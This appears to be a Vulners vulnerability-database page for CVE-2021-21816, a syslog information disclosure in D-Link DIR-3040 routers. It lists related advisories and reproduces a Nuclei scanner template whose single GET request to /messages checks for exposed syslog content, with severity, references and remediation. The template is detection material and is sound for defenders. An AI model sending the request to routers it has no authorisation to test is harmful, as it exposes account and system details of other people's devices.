| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2021-21816 | 27 Apr 202309:58 | – | circl | |
| D-LINK DIR-3040 信息泄露漏洞 | 15 Jul 202100:00 | – | cnnvd | |
| D-LINK DIR-3040 Information Disclosure Vulnerability (CNVD-2021-53338) | 19 Jul 202100:00 | – | cnvd | |
| CVE-2021-21816 | 16 Jul 202110:28 | – | cve | |
| CVE-2021-21816 | 16 Jul 202110:28 | – | cvelist | |
| CVE-2021-21816 | 16 Jul 202111:15 | – | nvd | |
| D-Link DIR-3040 < 1.13B03 Hotfix Multiple Vulnerabilities - Active Check | 3 Aug 202100:00 | – | openvas | |
| CVE-2021-21816 | 16 Jul 202111:15 | – | osv | |
| Information disclosure | 16 Jul 202111:15 | – | prion | |
| PT-2021-14792 · D Link · D-Link Dir-3040 | 16 Jul 202100:00 | – | ptsecurity |
id: CVE-2021-21816
info:
name: D-Link DIR-3040 1.13B03 - Information Disclosure
author: gy741
severity: medium
description: D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
impact: |
An attacker can exploit this vulnerability to gain sensitive information from the router, potentially leading to further attacks.
remediation: |
Upgrade the router firmware to the latest version provided by D-Link.
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281
- https://nvd.nist.gov/vuln/detail/CVE-2021-21816
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2021-21816
cwe-id: CWE-200
epss-score: 0.36486
epss-percentile: 0.98299
cpe: cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: dlink
product: dir-3040_firmware
tags: cve2021,cve,dlink,exposure,router,syslog,vuln
http:
- method: GET
path:
- "{{BaseURL}}/messages"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "syslog:"
- "admin"
- "/etc_ro/lighttpd/www"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402204a075778875b3243586f72e3c1a4ef5e3d0b05390b0cc5fb473a9ce3ac51a3de022073ab258bb1e6a535e5da92aa103e4ad7dd4a9ec039fcbec07124d369a3ca1d34:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation